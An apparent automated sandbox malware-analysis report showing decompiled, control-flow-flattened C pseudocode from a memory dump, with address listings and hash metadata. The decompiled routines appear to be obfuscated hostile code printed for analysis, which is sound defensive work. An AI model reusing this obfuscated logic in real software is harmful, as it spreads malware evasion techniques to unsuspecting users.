                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                                    								__eflags = _t154 - 0x6eae547;
                                                                                                                                                                                                                    							} while (_t154 != 0x6eae547);
                                                                                                                                                                                                                    							L46:
                                                                                                                                                                                                                    							return _t181;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t154 = 0xcdf2348;
                                                                                                                                                                                                                    						 *((intOrPtr*)(_t183 + 0x20)) = _v76;
                                                                                                                                                                                                                    						 *_t183 = _v84;
                                                                                                                                                                                                                    						 *((intOrPtr*)(_t183 + 8)) = _v108;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t154 == 0x1b8120f) {
                                                                                                                                                                                                                    						__eflags = _v96 - 6;
                                                                                                                                                                                                                    						if(_v96 == 6) {
                                                                                                                                                                                                                    							E00A64D6B( &_v104);
                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                    							_t154 = 0xae86473;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t154 = 0x24ccd1f;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t154 == 0x1c6eae8) {
                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                    						E00A62756(0);
                                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                                    						_t154 = 0xb01cdda;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t154 == 0x24ccd1f) {
                                                                                                                                                                                                                    						__eflags = _v96 - 7;
                                                                                                                                                                                                                    						if(_v96 == 7) {
                                                                                                                                                                                                                    							E00A740BB( &_v104);
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t154 == 0x28bfffe) {
                                                                                                                                                                                                                    						__eflags = _v96 - 4;
                                                                                                                                                                                                                    						if(_v96 == 4) {
                                                                                                                                                                                                                    							E00A75ECA( &_v104);
                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t154 = 0x3ded5a5;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t154 == 0x363e2c2) {
                                                                                                                                                                                                                    						__eflags = _v96 - 2;
                                                                                                                                                                                                                    						if(_v96 == 2) {
                                                                                                                                                                                                                    							E00A7AC3D( &_v104, _t183);
                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t154 = 0x93d52d6;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t154 != 0x3ded5a5) {
                                                                                                                                                                                                                    						goto L45;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_v96 == 5) {
                                                                                                                                                                                                                    						E00A775F1( &_v104, _t183);
                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t154 = 0x1b8120f;
                                                                                                                                                                                                                    					continue;
                                                                                                                                                                                                                    					L28:
                                                                                                                                                                                                                    					__eflags = _t154 - 0x93d52d6;
                                                                                                                                                                                                                    					if(_t154 == 0x93d52d6) {
                                                                                                                                                                                                                    						__eflags = _v96 - 3;
                                                                                                                                                                                                                    						if(_v96 == 3) {
                                                                                                                                                                                                                    							E00A75198( &_v104);
                                                                                                                                                                                                                    							_t154 = 0xae86473;
                                                                                                                                                                                                                    							goto L45;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t154 = 0x28bfffe;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					__eflags = _t154 - 0xa4f8cf4;
                                                                                                                                                                                                                    					if(_t154 == 0xa4f8cf4) {
                                                                                                                                                                                                                    						_t142 = E00A6AD68( &_v52,  &_v116, _v136);
                                                                                                                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                                                                                                                    						_t154 = ( ~_t142 & 0xf96a8df7) + 0xb01cdda;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					__eflags = _t154 - 0xae86473;
                                                                                                                                                                                                                    					if(_t154 == 0xae86473) {
                                                                                                                                                                                                                    						_t162 =  *0xa83b34;
                                                                                                                                                                                                                    						_t181 = _t181 + 1;
                                                                                                                                                                                                                    						 *(_t183 + 0x10) =  *(_t162 + 4);
                                                                                                                                                                                                                    						 *(_t162 + 4) = _t183;
                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					__eflags = _t154 - 0xb01cdda;
                                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                                    						_t145 = E00A7223A(_v156,  &_v28, __eflags,  &_v52, _v148, _v144);
                                                                                                                                                                                                                    						_t186 = _t186 + 0xc;
                                                                                                                                                                                                                    						__eflags = _t145;
                                                                                                                                                                                                                    						if(_t145 == 0) {
                                                                                                                                                                                                                    							goto L46;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					__eflags = _t154 - 0xcdf2348;
                                                                                                                                                                                                                    					if(_t154 == 0xcdf2348) {
                                                                                                                                                                                                                    						__eflags = _v96 - 1;
                                                                                                                                                                                                                    						if(_v96 == 1) {
                                                                                                                                                                                                                    							E00A6C227( &_v104);
                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t154 = 0x363e2c2;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					__eflags = _t154 - 0xd9c5947;
                                                                                                                                                                                                                    					if(_t154 != 0xd9c5947) {
                                                                                                                                                                                                                    						goto L45;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A773B3(_v120, _v124,  &_v28, _t152, _v128, _v152);
                                                                                                                                                                                                                    					_t186 = _t186 + 0x10;
                                                                                                                                                                                                                    					_t154 = 0x1c6eae8;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}






































                                                                                                                                                                                                                    0x00a7cfab
                                                                                                                                                                                                                    0x00a7cfb2
                                                                                                                                                                                                                    0x00a7cfb4
                                                                                                                                                                                                                    0x00a7cfbb
                                                                                                                                                                                                                    0x00a7cfbc
                                                                                                                                                                                                                    0x00a7cfbd
                                                                                                                                                                                                                    0x00a7cfc2
                                                                                                                                                                                                                    0x00a7cfcd
                                                                                                                                                                                                                    0x00a7cfcf
                                                                                                                                                                                                                    0x00a7cfda
                                                                                                                                                                                                                    0x00a7cfdd
                                                                                                                                                                                                                    0x00a7cfea
                                                                                                                                                                                                                    0x00a7cff1
                                                                                                                                                                                                                    0x00a7cff6
                                                                                                                                                                                                                    0x00a7d003
                                                                                                                                                                                                                    0x00a7d00b
                                                                                                                                                                                                                    0x00a7d013
                                                                                                                                                                                                                    0x00a7d01b
                                                                                                                                                                                                                    0x00a7d023
                                                                                                                                                                                                                    0x00a7d02b
                                                                                                                                                                                                                    0x00a7d033
                                                                                                                                                                                                                    0x00a7d038
                                                                                                                                                                                                                    0x00a7d040
                                                                                                                                                                                                                    0x00a7d048
                                                                                                                                                                                                                    0x00a7d050
                                                                                                                                                                                                                    0x00a7d058
                                                                                                                                                                                                                    0x00a7d060
                                                                                                                                                                                                                    0x00a7d06e
                                                                                                                                                                                                                    0x00a7d071
                                                                                                                                                                                                                    0x00a7d075
                                                                                                                                                                                                                    0x00a7d07a
                                                                                                                                                                                                                    0x00a7d07f
                                                                                                                                                                                                                    0x00a7d087
                                                                                                                                                                                                                    0x00a7d08f
                                                                                                                                                                                                                    0x00a7d09c
                                                                                                                                                                                                                    0x00a7d0a4
                                                                                                                                                                                                                    0x00a7d0ac
                                                                                                                                                                                                                    0x00a7d0b4
                                                                                                                                                                                                                    0x00a7d0b9
                                                                                                                                                                                                                    0x00a7d0c1
                                                                                                                                                                                                                    0x00a7d0c9
                                                                                                                                                                                                                    0x00a7d0cd
                                                                                                                                                                                                                    0x00a7d0d5
                                                                                                                                                                                                                    0x00a7d0dd
                                                                                                                                                                                                                    0x00a7d0e7
                                                                                                                                                                                                                    0x00a7d0eb
                                                                                                                                                                                                                    0x00a7d0ef
                                                                                                                                                                                                                    0x00a7d0f7
                                                                                                                                                                                                                    0x00a7d0ff
                                                                                                                                                                                                                    0x00a7d10c
                                                                                                                                                                                                                    0x00a7d110
                                                                                                                                                                                                                    0x00a7d115
                                                                                                                                                                                                                    0x00a7d11d
                                                                                                                                                                                                                    0x00a7d125
                                                                                                                                                                                                                    0x00a7d12d
                                                                                                                                                                                                                    0x00a7d135
                                                                                                                                                                                                                    0x00a7d13d
                                                                                                                                                                                                                    0x00a7d13d
                                                                                                                                                                                                                    0x00a7d143
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d149
                                                                                                                                                                                                                    0x00a7d149
                                                                                                                                                                                                                    0x00a7d22d
                                                                                                                                                                                                                    0x00a7d230
                                                                                                                                                                                                                    0x00a7d232
                                                                                                                                                                                                                    0x00a7d303
                                                                                                                                                                                                                    0x00a7d303
                                                                                                                                                                                                                    0x00a7d308
                                                                                                                                                                                                                    0x00a7d13d
                                                                                                                                                                                                                    0x00a7d13d
                                                                                                                                                                                                                    0x00a7d13d
                                                                                                                                                                                                                    0x00a7d143
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d143
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d370
                                                                                                                                                                                                                    0x00a7d370
                                                                                                                                                                                                                    0x00a7d370
                                                                                                                                                                                                                    0x00a7d37c
                                                                                                                                                                                                                    0x00a7d388
                                                                                                                                                                                                                    0x00a7d388
                                                                                                                                                                                                                    0x00a7d23c
                                                                                                                                                                                                                    0x00a7d241
                                                                                                                                                                                                                    0x00a7d248
                                                                                                                                                                                                                    0x00a7d24e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d24e
                                                                                                                                                                                                                    0x00a7d155
                                                                                                                                                                                                                    0x00a7d202
                                                                                                                                                                                                                    0x00a7d207
                                                                                                                                                                                                                    0x00a7d217
                                                                                                                                                                                                                    0x00a7d1a4
                                                                                                                                                                                                                    0x00a7d1a4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1a4
                                                                                                                                                                                                                    0x00a7d209
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d209
                                                                                                                                                                                                                    0x00a7d161
                                                                                                                                                                                                                    0x00a7d1f1
                                                                                                                                                                                                                    0x00a7d1f3
                                                                                                                                                                                                                    0x00a7d1f8
                                                                                                                                                                                                                    0x00a7d1f8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1f8
                                                                                                                                                                                                                    0x00a7d16d
                                                                                                                                                                                                                    0x00a7d1df
                                                                                                                                                                                                                    0x00a7d1e4
                                                                                                                                                                                                                    0x00a7d1ea
                                                                                                                                                                                                                    0x00a7d1ea
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1e4
                                                                                                                                                                                                                    0x00a7d175
                                                                                                                                                                                                                    0x00a7d1c3
                                                                                                                                                                                                                    0x00a7d1c8
                                                                                                                                                                                                                    0x00a7d1d8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1d8
                                                                                                                                                                                                                    0x00a7d1ca
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1ca
                                                                                                                                                                                                                    0x00a7d17d
                                                                                                                                                                                                                    0x00a7d1a8
                                                                                                                                                                                                                    0x00a7d1ad
                                                                                                                                                                                                                    0x00a7d1bc
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1bc
                                                                                                                                                                                                                    0x00a7d1af
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d1af
                                                                                                                                                                                                                    0x00a7d185
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d190
                                                                                                                                                                                                                    0x00a7d19f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d19f
                                                                                                                                                                                                                    0x00a7d192
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d256
                                                                                                                                                                                                                    0x00a7d256
                                                                                                                                                                                                                    0x00a7d25c
                                                                                                                                                                                                                    0x00a7d354
                                                                                                                                                                                                                    0x00a7d359
                                                                                                                                                                                                                    0x00a7d369
                                                                                                                                                                                                                    0x00a7d36e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d36e
                                                                                                                                                                                                                    0x00a7d35b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d35b
                                                                                                                                                                                                                    0x00a7d262
                                                                                                                                                                                                                    0x00a7d268
                                                                                                                                                                                                                    0x00a7d336
                                                                                                                                                                                                                    0x00a7d341
                                                                                                                                                                                                                    0x00a7d349
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d349
                                                                                                                                                                                                                    0x00a7d26e
                                                                                                                                                                                                                    0x00a7d270
                                                                                                                                                                                                                    0x00a7d30d
                                                                                                                                                                                                                    0x00a7d313
                                                                                                                                                                                                                    0x00a7d317
                                                                                                                                                                                                                    0x00a7d31a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d31a
                                                                                                                                                                                                                    0x00a7d276
                                                                                                                                                                                                                    0x00a7d27c
                                                                                                                                                                                                                    0x00a7d2f7
                                                                                                                                                                                                                    0x00a7d2fc
                                                                                                                                                                                                                    0x00a7d2ff
                                                                                                                                                                                                                    0x00a7d301
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d301
                                                                                                                                                                                                                    0x00a7d27e
                                                                                                                                                                                                                    0x00a7d284
                                                                                                                                                                                                                    0x00a7d2bd
                                                                                                                                                                                                                    0x00a7d2c2
                                                                                                                                                                                                                    0x00a7d2d2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d2d2
                                                                                                                                                                                                                    0x00a7d2c4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d2c4
                                                                                                                                                                                                                    0x00a7d286
                                                                                                                                                                                                                    0x00a7d28c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7d2ab
                                                                                                                                                                                                                    0x00a7d2b0
                                                                                                                                                                                                                    0x00a7d2b3
                                                                                                                                                                                                                    0x00a7d2b3

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: sd${+$w
                                                                                                                                                                                                                    • API String ID: 0-2227604287
                                                                                                                                                                                                                    • Opcode ID: 94bf4f424ccd9740b599f15efa1f0cbbf12f86474cdfa70b1fa95d3a12f2b41e
                                                                                                                                                                                                                    • Instruction ID: 01952912f2684318a55b37e71843db4a023f5bf0bbcc021229cb33b61956cb3b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94bf4f424ccd9740b599f15efa1f0cbbf12f86474cdfa70b1fa95d3a12f2b41e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 239185715093408BD728DF20C99952BBBF5EFC5748F54CA1EF28A9A260DB709909CB83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                    			E00A775F1(void* __ecx, void* __edx) {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                                    				signed int _t151;
                                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                                    				intOrPtr _t154;
                                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                                    				signed int _t159;
                                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                                    				void* _t178;
                                                                                                                                                                                                                    				signed int* _t181;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t181 =  &_v64;
                                                                                                                                                                                                                    				_v56 = 0xc0f4d;
                                                                                                                                                                                                                    				_v56 = _v56 << 0x10;
                                                                                                                                                                                                                    				_v56 = _v56 >> 0xe;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xffffd1d0;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x0000b575;
                                                                                                                                                                                                                    				_v12 = 0x4ea094;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xc912;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0043dff9;
                                                                                                                                                                                                                    				_v52 = 0x1a660c;
                                                                                                                                                                                                                    				_v52 = _v52 * 5;
                                                                                                                                                                                                                    				_t177 = __edx;
                                                                                                                                                                                                                    				_t157 = __ecx;
                                                                                                                                                                                                                    				_t178 = 0x494d32e;
                                                                                                                                                                                                                    				_t159 = 0x1c;
                                                                                                                                                                                                                    				_v52 = _v52 / _t159;
                                                                                                                                                                                                                    				_v52 = _v52 + 0x10da;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0007602f;
                                                                                                                                                                                                                    				_v8 = 0x6489d6;
                                                                                                                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x0003146d;
                                                                                                                                                                                                                    				_v32 = 0xa8ed6;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffffb44e;
                                                                                                                                                                                                                    				_t160 = 0x3c;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x25;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x017420ca;
                                                                                                                                                                                                                    				_v48 = 0xcee07c;
                                                                                                                                                                                                                    				_v48 = _v48 << 5;
                                                                                                                                                                                                                    				_v48 = _v48 | 0xcf035491;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0xa68f32f3;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x7958d9c3;
                                                                                                                                                                                                                    				_v28 = 0xfd7331;
                                                                                                                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                                                                                                                    				_v28 = _v28 >> 3;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x1ebe1886;
                                                                                                                                                                                                                    				_v40 = 0xfb53d8;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffffa5ea;
                                                                                                                                                                                                                    				_v40 = _v40 >> 0xb;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x000e84ed;
                                                                                                                                                                                                                    				_v64 = 0x576855;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff7078;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xdc0d;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffffd8c1;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x005530f6;
                                                                                                                                                                                                                    				_v16 = 0x939abd;
                                                                                                                                                                                                                    				_v16 = _v16 * 0x33;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x1d6ed7ee;
                                                                                                                                                                                                                    				_v20 = 0xb8aef4;
                                                                                                                                                                                                                    				_v20 = _v20 / _t160;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00057e18;
                                                                                                                                                                                                                    				_v24 = 0x2b4d43;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x81d4;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x002d5198;
                                                                                                                                                                                                                    				_v60 = 0x20fe4;
                                                                                                                                                                                                                    				_v60 = _v60 << 7;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xa60;
                                                                                                                                                                                                                    				_v60 = _v60 >> 2;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x0048b0a2;
                                                                                                                                                                                                                    				_v36 = 0x45f9a7;
                                                                                                                                                                                                                    				_v36 = _v36 >> 6;
                                                                                                                                                                                                                    				_v36 = _v36 >> 7;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00021e75;
                                                                                                                                                                                                                    				_v4 = 0x864697;
                                                                                                                                                                                                                    				_v4 = _v4 >> 9;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x000220c3;
                                                                                                                                                                                                                    				_v44 = 0x885010;
                                                                                                                                                                                                                    				_v44 = _v44 << 9;
                                                                                                                                                                                                                    				_v44 = _v44 | 0x4526371b;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xffff7ab5;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x55a3eac8;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t150 = 0x6e7613a;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						while(_t178 != 0x1ecd27c) {
                                                                                                                                                                                                                    							if(_t178 == 0x494d32e) {
                                                                                                                                                                                                                    								_t178 = 0x1ecd27c;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t178 == 0x6cc417f) {
                                                                                                                                                                                                                    								return E00A74013(_v4, _v44,  *(_t177 + 0x2c));
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t178 != _t150) {
                                                                                                                                                                                                                    								if(_t178 != 0xbae7233) {
                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t160 = _v40;
                                                                                                                                                                                                                    									_t154 = E00A68F8F(_v40, _v64,  *(_t177 + 0x2c));
                                                                                                                                                                                                                    									_t181 =  &(_t181[1]);
                                                                                                                                                                                                                    									 *((intOrPtr*)(_t177 + 0x18)) = _t154;
                                                                                                                                                                                                                    									_t150 = 0x6e7613a;
                                                                                                                                                                                                                    									_t178 =  !=  ? 0x6e7613a : 0x6cc417f;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t153 = E00A646D0(_v16, _t160, _t177, _v20, _v24, _v60, _t160, _v36, _t160, E00A73AA0);
                                                                                                                                                                                                                    							_t181 =  &(_t181[9]);
                                                                                                                                                                                                                    							 *(_t177 + 4) = _t153;
                                                                                                                                                                                                                    							__eflags = _t153;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_t178 = 0x6cc417f;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L1:
                                                                                                                                                                                                                    									_t150 = 0x6e7613a;
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							return _t153;
                                                                                                                                                                                                                    							L18:
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t151 = E00A7B2B8(_v56, _v12, __eflags, _t160);
                                                                                                                                                                                                                    						 *(_t177 + 0x2c) = _t151;
                                                                                                                                                                                                                    						_t160 = _t157;
                                                                                                                                                                                                                    						__eflags = _t151;
                                                                                                                                                                                                                    						if(_t151 == 0) {
                                                                                                                                                                                                                    							_t178 = 0x24deba3;
                                                                                                                                                                                                                    							_t150 = 0x6e7613a;
                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							E00A797C3(_v52, _t151, _t151, _v8, _v32);
                                                                                                                                                                                                                    							_push(_v28);
                                                                                                                                                                                                                    							_t160 =  *(_t177 + 0x2c);
                                                                                                                                                                                                                    							E00A6FDE3( *(_t177 + 0x2c), _v48);
                                                                                                                                                                                                                    							_t181 =  &(_t181[4]);
                                                                                                                                                                                                                    							_t178 = 0xbae7233;
                                                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                    						__eflags = _t178 - 0x24deba3;
                                                                                                                                                                                                                    					} while (__eflags != 0);
                                                                                                                                                                                                                    					return _t150;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                    0x00a775f1
                                                                                                                                                                                                                    0x00a775f4
                                                                                                                                                                                                                    0x00a775fc
                                                                                                                                                                                                                    0x00a77601
                                                                                                                                                                                                                    0x00a77606
                                                                                                                                                                                                                    0x00a7760e
                                                                                                                                                                                                                    0x00a77616
                                                                                                                                                                                                                    0x00a7761e
                                                                                                                                                                                                                    0x00a77626
                                                                                                                                                                                                                    0x00a7762e
                                                                                                                                                                                                                    0x00a7763f
                                                                                                                                                                                                                    0x00a77643
                                                                                                                                                                                                                    0x00a7764d
                                                                                                                                                                                                                    0x00a7764f
                                                                                                                                                                                                                    0x00a77654
                                                                                                                                                                                                                    0x00a77659
                                                                                                                                                                                                                    0x00a7765f
                                                                                                                                                                                                                    0x00a77667
                                                                                                                                                                                                                    0x00a7766f
                                                                                                                                                                                                                    0x00a77677
                                                                                                                                                                                                                    0x00a7767c
                                                                                                                                                                                                                    0x00a77684
                                                                                                                                                                                                                    0x00a7768c
                                                                                                                                                                                                                    0x00a77699
                                                                                                                                                                                                                    0x00a7769a
                                                                                                                                                                                                                    0x00a7769e
                                                                                                                                                                                                                    0x00a776a6
                                                                                                                                                                                                                    0x00a776ae
                                                                                                                                                                                                                    0x00a776b3
                                                                                                                                                                                                                    0x00a776bb
                                                                                                                                                                                                                    0x00a776c3
                                                                                                                                                                                                                    0x00a776cb
                                                                                                                                                                                                                    0x00a776d3
                                                                                                                                                                                                                    0x00a776d8
                                                                                                                                                                                                                    0x00a776dd
                                                                                                                                                                                                                    0x00a776e5
                                                                                                                                                                                                                    0x00a776ed
                                                                                                                                                                                                                    0x00a776f5
                                                                                                                                                                                                                    0x00a776fa
                                                                                                                                                                                                                    0x00a77702
                                                                                                                                                                                                                    0x00a7770a
                                                                                                                                                                                                                    0x00a77712
                                                                                                                                                                                                                    0x00a7771a
                                                                                                                                                                                                                    0x00a77722
                                                                                                                                                                                                                    0x00a7772a
                                                                                                                                                                                                                    0x00a77737
                                                                                                                                                                                                                    0x00a7773b
                                                                                                                                                                                                                    0x00a77743
                                                                                                                                                                                                                    0x00a77751
                                                                                                                                                                                                                    0x00a77755
                                                                                                                                                                                                                    0x00a7775d
                                                                                                                                                                                                                    0x00a77765
                                                                                                                                                                                                                    0x00a7776d
                                                                                                                                                                                                                    0x00a77775
                                                                                                                                                                                                                    0x00a7777d
                                                                                                                                                                                                                    0x00a77782
                                                                                                                                                                                                                    0x00a7778a
                                                                                                                                                                                                                    0x00a7778f
                                                                                                                                                                                                                    0x00a77797
                                                                                                                                                                                                                    0x00a7779f
                                                                                                                                                                                                                    0x00a777a4
                                                                                                                                                                                                                    0x00a777a9
                                                                                                                                                                                                                    0x00a777b1
                                                                                                                                                                                                                    0x00a777b9
                                                                                                                                                                                                                    0x00a777be
                                                                                                                                                                                                                    0x00a777c6
                                                                                                                                                                                                                    0x00a777ce
                                                                                                                                                                                                                    0x00a777d3
                                                                                                                                                                                                                    0x00a777e0
                                                                                                                                                                                                                    0x00a777e8
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a777f0
                                                                                                                                                                                                                    0x00a777f5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a777f5
                                                                                                                                                                                                                    0x00a77807
                                                                                                                                                                                                                    0x00a7787c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7787c
                                                                                                                                                                                                                    0x00a7780b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a778f7
                                                                                                                                                                                                                    0x00a77813
                                                                                                                                                                                                                    0x00a7781b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77821
                                                                                                                                                                                                                    0x00a77828
                                                                                                                                                                                                                    0x00a7782c
                                                                                                                                                                                                                    0x00a77831
                                                                                                                                                                                                                    0x00a77834
                                                                                                                                                                                                                    0x00a7783b
                                                                                                                                                                                                                    0x00a77840
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77840
                                                                                                                                                                                                                    0x00a7781b
                                                                                                                                                                                                                    0x00a77862
                                                                                                                                                                                                                    0x00a77867
                                                                                                                                                                                                                    0x00a7786a
                                                                                                                                                                                                                    0x00a7786d
                                                                                                                                                                                                                    0x00a7786f
